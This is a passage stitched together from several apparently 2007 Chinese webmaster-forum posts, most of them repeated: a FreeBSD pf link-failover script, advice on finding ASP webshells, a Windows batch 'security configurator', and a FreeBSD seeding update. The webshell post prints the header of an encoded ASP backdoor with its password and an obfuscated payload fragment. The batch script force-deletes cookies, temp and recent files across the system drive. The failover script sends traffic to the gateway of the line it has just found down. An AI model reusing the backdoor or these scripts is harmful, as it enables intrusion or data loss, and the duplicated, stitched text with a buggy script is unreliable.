CCTV1:晚间新闻,大陆10月物价上涨6.6%,群众一致表示“对生活影响不大”。
CCTV4:海峡两岸,台湾物价增长4.5%,民众大叫“活不了了”。
CCTV4:海峡两岸,台湾物价增长4.5%,民众大叫“活不了了”。
#!/bin/sh
#Man1和MAN2的网关
gw1=AA.AA.AA.AA
gw2=BB.BB.BB.BB
#默认规则,Man1,MAN2等规则
PF_Default=/etc/pf.conf
PF_Man1=/etc/pf/pf_man1.conf
PF_Man2=/etc/pf/PF_man2.conf
#记录链路状态和线路故障的事件
Link_State=/etc/pf/Link_State
Link_State_Log=/var/log/Link_State_Log
#获取上一次的状态值
Previously_Link_State=`cat $Link_State`
#程序开始
if ping -c1 -w1 $gw1 >/dev/null 2>&1
then
if ping -c1 -w1 $gw2 >/dev/null 2>&1
then
L_State=2 #双线都通
echo $L_State > $Link_State
else
L_State=1 #MAN1 的线路通
echo $L_State > $Link_State
fi
else
if ping -c1 -w1 $gw2 >/dev/null 2>&1
then
L_State=0 # MAN2 通
echo $L_State > $Link_State
else
L_State=-1 #双线都不通
echo $L_State > $Link_State
fi
fi
if [ $Previously_Link_State -eq $L_State ]
then
echo " Link State Not Change !"
else
case $L_State in
2)
echo "All Link is UP at `date`! " >> $Link_State_Log
pfctl -f $PF_Default
;;
1)
echo "Link MAN1 is UP! Link MAN2 is Down at `date`!" >> $Link_State_Log
#单线路时对默认路由的修改
route delete default
route add default $gw1
pfctl -f $PF_Man1
;;
0)
echo "Link MAN1 is Down ! Link MAN2 is UP at `date`!" >> $Link_State_Log
#cat /root/wu/route | xargs -L 1 route delete #删除某些MAN2
route delete default
route add default $gw1
pfctl -f $PF_Man2
;;
-1)
echo "All Link is Down at `date`!" >> $Link_State_Log
;;
esac
fi
把以上文件保存为:
pf_monitor.sh
修改权限:
chmod +x pf_monitor.sh
然后在 /var/cron/tabs/root 加入以下:
* * * * * root /etc/pf_monitor.sh
#Man1和MAN2的网关
gw1=AA.AA.AA.AA
gw2=BB.BB.BB.BB
#默认规则,Man1,MAN2等规则
PF_Default=/etc/pf.conf
PF_Man1=/etc/pf/pf_man1.conf
PF_Man2=/etc/pf/PF_man2.conf
#记录链路状态和线路故障的事件
Link_State=/etc/pf/Link_State
Link_State_Log=/var/log/Link_State_Log
#获取上一次的状态值
Previously_Link_State=`cat $Link_State`
#程序开始
if ping -c1 -w1 $gw1 >/dev/null 2>&1
then
if ping -c1 -w1 $gw2 >/dev/null 2>&1
then
L_State=2 #双线都通
echo $L_State > $Link_State
else
L_State=1 #MAN1 的线路通
echo $L_State > $Link_State
fi
else
if ping -c1 -w1 $gw2 >/dev/null 2>&1
then
L_State=0 # MAN2 通
echo $L_State > $Link_State
else
L_State=-1 #双线都不通
echo $L_State > $Link_State
fi
fi
if [ $Previously_Link_State -eq $L_State ]
then
echo " Link State Not Change !"
else
case $L_State in
2)
echo "All Link is UP at `date`! " >> $Link_State_Log
pfctl -f $PF_Default
;;
1)
echo "Link MAN1 is UP! Link MAN2 is Down at `date`!" >> $Link_State_Log
#单线路时对默认路由的修改
route delete default
route add default $gw1
pfctl -f $PF_Man1
;;
0)
echo "Link MAN1 is Down ! Link MAN2 is UP at `date`!" >> $Link_State_Log
#cat /root/wu/route | xargs -L 1 route delete #删除某些MAN2
route delete default
route add default $gw1
pfctl -f $PF_Man2
;;
-1)
echo "All Link is Down at `date`!" >> $Link_State_Log
;;
esac
fi
把以上文件保存为:
pf_monitor.sh
修改权限:
chmod +x pf_monitor.sh
然后在 /var/cron/tabs/root 加入以下:
* * * * * root /etc/pf_monitor.sh
近日服务器上的网站经常被人挂网页木马,凡是网页文件最下面都被加了框架,特别的烦,用文件批量替换工具,删除了挂上的框架,但是没过多久又被挂上,后来总结了一下经验,虽然把挂的病毒代码去掉了,但是没有把挂马用的asp木马给找出来。后来发现一个非常简单的版本来找asp木马,就是利用windows自动搜索功能,文件名 *.as* 然后选择高级中的文件大小 至少大于55KB,这样一搜就asp木马找出来了,当然找出来了,其中有一些正常asp文件,一般动网的论坛有一些文件是大于55KB的,还有就是改了名字的access数据库,先观察一下,看看那个文件的文件名比较怪异,然后打开看,如果发现里面全部是乱码,那就可以肯定是asp木马了,还有看文件存放的路径,一般asp木马都存在于存放图片的木马或者是数据库备份的文件夹里面。挨个仔细看,找出asp木马后,还要看这个木马是放在哪个目录,如果是图片目录的话,一些虚拟主机有关比执行权限,把图片文件设置成不能运行脚本的目录,这样可以防止再次被入侵。有一次我发现一个可怜的网站,抓了 8个asp木马出来,各种版本的都不同,他运气也太多了,挂了那么多木马,网站文件下面堆砌了10多个框架,我还第一次遇到呢。当然还有一些比较专业的工具可以查找asp木马,不过如果你网站文件特别多的话,那就速度特别慢了,这个办法算是最快最准确的方法了。最常见的都是框架挂马,有一次处理一个黑客站点的网站的时候遇到 js挂马,那次可特别费心,那个站长也是搞黑客的,网站还挂了教程,关于挂马的。查了半天才发现是在一个js文件中。那个算是比较高级的挂马方式了,关于 css挂马的,我还没有遇到过。有遇到过的朋友可以拿出来分享一下看看。
说实话,我非常佩服写第一个asp木马的人,仔细把asp木马解密出来看就发现,每个代码写的非常严谨的,可以说把asp的功能发挥到极点了。asp木马解密出来看起来也好像是乱码,不过仔细一看,排一下版就清楚了。
另外以前写过关于其他更详细的清除asp木马的文章,可以参看 http://cdn.e-spirit.cn/style/info/shownews.asp?id=190
常见的asp木马一般开头都这个样子
<%@ LANGUAGE = VBScript.Encode %>
<%
UserPass="zzs7758" //后门密码的
mName="。" ///后门版全
Copyright="注:请勿用于非法用途,否则后果作者概不负责"
#@~^AAUAAA==@#@&?nM\DRUmMrwDKr:W;O{,,O1,O,,O@#@&I/aWU/n ~EW0.P{Y.;@#@&6U,2.DK.,InkEs+Pg+XO@#@&?;A,?46S2I"c#@#@&P,(WPADMPPC3H@#@&~P,~IM?E@!(D@*@!C,t.+6xELC7lkmDbwDltb/OWMX 8mm3vbB@*@!4M@*'x(/aiEP'~AD.R93/;D(KDkrH~LPE@!JC@*@!8M@*r@#@&,P,~+"D md2C]=I+kKr ?+cosEUt@#@&~PnU9Prs@#@&2gf~j!A@#@&d!4~DMdv?PM#@#@&d"+UKW /3RSI(O`?D]#@#@&+ [~?`A@#@&ojH/:k61,]+hlO4v?#@#@&,P.+a):tx"+hSb12vd~r-E~r-wE*@#@&UN,sE ^Oq}x@#@&WjU/DqGx,]IwCO4`/b@#@&P~IM3hbP4'"2w^b1n`k~E- 'JSE'J#@#@&+gNP6iUZDkKx@#@&j4b?Cx{E╋╁@*M+OUmz@!@*mz@!回返
原文出处:http://www.im286.com/thread-2262703-1-1.html
说实话,我非常佩服写第一个asp木马的人,仔细把asp木马解密出来看就发现,每个代码写的非常严谨的,可以说把asp的功能发挥到极点了。asp木马解密出来看起来也好像是乱码,不过仔细一看,排一下版就清楚了。
另外以前写过关于其他更详细的清除asp木马的文章,可以参看 http://cdn.e-spirit.cn/style/info/shownews.asp?id=190
常见的asp木马一般开头都这个样子
<%@ LANGUAGE = VBScript.Encode %>
<%
UserPass="zzs7758" //后门密码的
mName="。" ///后门版全
Copyright="注:请勿用于非法用途,否则后果作者概不负责"
#@~^AAUAAA==@#@&?nM\DRUmMrwDKr:W;O{,,O1,O,,O@#@&I/aWU/n ~EW0.P{Y.;@#@&6U,2.DK.,InkEs+Pg+XO@#@&?;A,?46S2I"c#@#@&P,(WPADMPPC3H@#@&~P,~IM?E@!(D@*@!C,t.+6xELC7lkmDbwDltb/OWMX 8mm3vbB@*@!4M@*'x(/aiEP'~AD.R93/;D(KDkrH~LPE@!JC@*@!8M@*r@#@&,P,~+"D md2C]=I+kKr ?+cosEUt@#@&~PnU9Prs@#@&2gf~j!A@#@&d!4~DMdv?PM#@#@&d"+UKW /3RSI(O`?D]#@#@&+ [~?`A@#@&ojH/:k61,]+hlO4v?#@#@&,P.+a):tx"+hSb12vd~r-E~r-wE*@#@&UN,sE ^Oq}x@#@&WjU/DqGx,]IwCO4`/b@#@&P~IM3hbP4'"2w^b1n`k~E- 'JSE'J#@#@&+gNP6iUZDkKx@#@&j4b?Cx{E╋╁@*M+OUmz@!@*mz@!回返
原文出处:http://www.im286.com/thread-2262703-1-1.html
此贴原来在新手区,是我申请落伍时发的,现在转到本版一份儿,因为发在本版比较适合一点,请各位高手们指点!我的QQ是303657,欢迎交流!
公布我的原创安全设置器最新版本儿全部源代码!此贴省去了全自动设置服务器和系统服务优化的代码,太多了,贴子有字数限制,兄弟们可以直接下载我提供的下载地址,里面是全部源代码并含有帮助文件,适合各类WINDOWS服务器和新老站长使用!
下载地址:
下载文件
============================================
@Echo Off
TITLE 常来网服务器高级安全设置器
:start
CLS
COLOR 1f
Rem 使用COLOR命令对控制台输出颜色进行更改
MODE con: COLS=32 LINES=21
Rem MODE语句为设定窗体的宽和高
Set tm1=%time:~0,2%
Set tm2=%time:~3,2%
Set tm3=%time:~6,2%
Echo %date% %tm1%点%tm2%分%tm3%秒
Echo ================================
Echo 请选择要进行的操作,然后按回车
Echo ───────────────
Echo.
Echo A. 一键搞定/全自动设置服务器
Echo 0. 清理系统垃圾文件
Echo 1. 给系统危险文件设置权限
Echo 2. 给系统危险文件夹设置权限
Echo 3. 系统服务优化
Echo 4. 注册表危险组件删除
Echo 5. 防DDOS洪水攻击处理
Echo 6. 导入常来网专用安全策略
Echo 7. 重启IIS使设置生效
Echo 8. 刷新当前时间
Echo 9. 锁定计算机
Echo L. 注销当前用户
Echo Q. 退出安全设置器
Echo.
:cho
Set Choice=
Set /P Choice=选择:
Rem 设定变量"Choice"为用户输入的字符
If Not "%Choice%"=="" Set Choice=%Choice:~0,1%
Rem 如果输入大于1位,取第1位,比如输入132,则返回值为1
Echo.
If /I "%Choice%"=="A" Goto Auto
If /I "%Choice%"=="0" Goto Clear
If /I "%Choice%"=="1" Goto SetFile
If /I "%Choice%"=="2" Goto SetFolder
If /I "%Choice%"=="3" Goto Service
If /I "%Choice%"=="4" Goto Reg
If /I "%Choice%"=="5" Goto Ddos
If /I "%Choice%"=="6" Goto Ipsec
If /I "%Choice%"=="7" Goto restartiis
If /I "%Choice%"=="8" Goto start
If /I "%Choice%"=="9" Goto lock
If /I "%Choice%"=="L" Goto logoff
If /I "%Choice%"=="Q" Goto End
Rem 为避免出现返回值为空或含空格而导致程序异常,需在变量外另加双引号
Rem 注意,If语句需要双等于号
Rem 如果输入的字符不是以上数字,将返回重新输入
Echo 选择无效,请重新输入
Echo.
Goto cho
:Clear
CLS
MODE con: COLS=80 LINES=18
COLOR 70
Echo.
Echo 正在清理系统垃圾文件,请稍等......
del /f /s /q %systemdrive%\*.tmp
del /f /s /q %systemdrive%\*._mp
del /f /s /q %systemdrive%\*.gid
del /f /s /q %systemdrive%\*.chk
del /f /s /q %systemdrive%\*.old
del /f /s /q %systemdrive%\recycled\*.*
del /f /s /q %windir%\*.bak
del /f /s /q %windir%\prefetch\*.*
del /f /s /q %windir%\temp\*.*
del /f /q %userprofile%\cookies\*.*
del /f /q %userprofile%\recent\*.*
del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"
del /f /s /q "%userprofile%\Local Settings\Temp\*.*"
del /f /s /q "%userprofile%\recent\*.*"
Echo 清理系统垃圾完成! 请按任意键返回并选1继续...
PAUSE >nul
Goto start
公布我的原创安全设置器最新版本儿全部源代码!此贴省去了全自动设置服务器和系统服务优化的代码,太多了,贴子有字数限制,兄弟们可以直接下载我提供的下载地址,里面是全部源代码并含有帮助文件,适合各类WINDOWS服务器和新老站长使用!
下载地址:
下载文件 ============================================
@Echo Off
TITLE 常来网服务器高级安全设置器
:start
CLS
COLOR 1f
Rem 使用COLOR命令对控制台输出颜色进行更改
MODE con: COLS=32 LINES=21
Rem MODE语句为设定窗体的宽和高
Set tm1=%time:~0,2%
Set tm2=%time:~3,2%
Set tm3=%time:~6,2%
Echo %date% %tm1%点%tm2%分%tm3%秒
Echo ================================
Echo 请选择要进行的操作,然后按回车
Echo ───────────────
Echo.
Echo A. 一键搞定/全自动设置服务器
Echo 0. 清理系统垃圾文件
Echo 1. 给系统危险文件设置权限
Echo 2. 给系统危险文件夹设置权限
Echo 3. 系统服务优化
Echo 4. 注册表危险组件删除
Echo 5. 防DDOS洪水攻击处理
Echo 6. 导入常来网专用安全策略
Echo 7. 重启IIS使设置生效
Echo 8. 刷新当前时间
Echo 9. 锁定计算机
Echo L. 注销当前用户
Echo Q. 退出安全设置器
Echo.
:cho
Set Choice=
Set /P Choice=选择:
Rem 设定变量"Choice"为用户输入的字符
If Not "%Choice%"=="" Set Choice=%Choice:~0,1%
Rem 如果输入大于1位,取第1位,比如输入132,则返回值为1
Echo.
If /I "%Choice%"=="A" Goto Auto
If /I "%Choice%"=="0" Goto Clear
If /I "%Choice%"=="1" Goto SetFile
If /I "%Choice%"=="2" Goto SetFolder
If /I "%Choice%"=="3" Goto Service
If /I "%Choice%"=="4" Goto Reg
If /I "%Choice%"=="5" Goto Ddos
If /I "%Choice%"=="6" Goto Ipsec
If /I "%Choice%"=="7" Goto restartiis
If /I "%Choice%"=="8" Goto start
If /I "%Choice%"=="9" Goto lock
If /I "%Choice%"=="L" Goto logoff
If /I "%Choice%"=="Q" Goto End
Rem 为避免出现返回值为空或含空格而导致程序异常,需在变量外另加双引号
Rem 注意,If语句需要双等于号
Rem 如果输入的字符不是以上数字,将返回重新输入
Echo 选择无效,请重新输入
Echo.
Goto cho
:Clear
CLS
MODE con: COLS=80 LINES=18
COLOR 70
Echo.
Echo 正在清理系统垃圾文件,请稍等......
del /f /s /q %systemdrive%\*.tmp
del /f /s /q %systemdrive%\*._mp
del /f /s /q %systemdrive%\*.gid
del /f /s /q %systemdrive%\*.chk
del /f /s /q %systemdrive%\*.old
del /f /s /q %systemdrive%\recycled\*.*
del /f /s /q %windir%\*.bak
del /f /s /q %windir%\prefetch\*.*
del /f /s /q %windir%\temp\*.*
del /f /q %userprofile%\cookies\*.*
del /f /q %userprofile%\recent\*.*
del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"
del /f /s /q "%userprofile%\Local Settings\Temp\*.*"
del /f /s /q "%userprofile%\recent\*.*"
Echo 清理系统垃圾完成! 请按任意键返回并选1继续...
PAUSE >nul
Goto start
2007.11.16
更新第一部分:VMWare设置和FreeBSD系统初装
2007.11.21
更新第二部分:系统源码更新和内核编译
目前在电信、网通、教育等4条不同线路,服务器24小时采用rtorrent+screen做种,取代了原有的mldonkey,链接速度应该更快。不过由于peer过少,还是有些朋友要很长时间才能连上种子。所以请下载完的朋友们多开一会BT,相信也有很多朋友有能力通过服务器帮助做种,如果您能分配1K给这份视频,只要能帮助其他用户通过peer交换链接到我们种子服务器,我将代表其他朋友感激不尽!
其他部分会陆续推出,请继续关注
[ 本帖最后由 HarbinBeer 于 2007-11-22 07:24 编辑 ]
下载文件
来源出处:http://www.im286.com/thread-2255068-1-1.html
更新第一部分:VMWare设置和FreeBSD系统初装
2007.11.21
更新第二部分:系统源码更新和内核编译
目前在电信、网通、教育等4条不同线路,服务器24小时采用rtorrent+screen做种,取代了原有的mldonkey,链接速度应该更快。不过由于peer过少,还是有些朋友要很长时间才能连上种子。所以请下载完的朋友们多开一会BT,相信也有很多朋友有能力通过服务器帮助做种,如果您能分配1K给这份视频,只要能帮助其他用户通过peer交换链接到我们种子服务器,我将代表其他朋友感激不尽!
其他部分会陆续推出,请继续关注
[ 本帖最后由 HarbinBeer 于 2007-11-22 07:24 编辑 ]
下载文件 来源出处:http://www.im286.com/thread-2255068-1-1.html
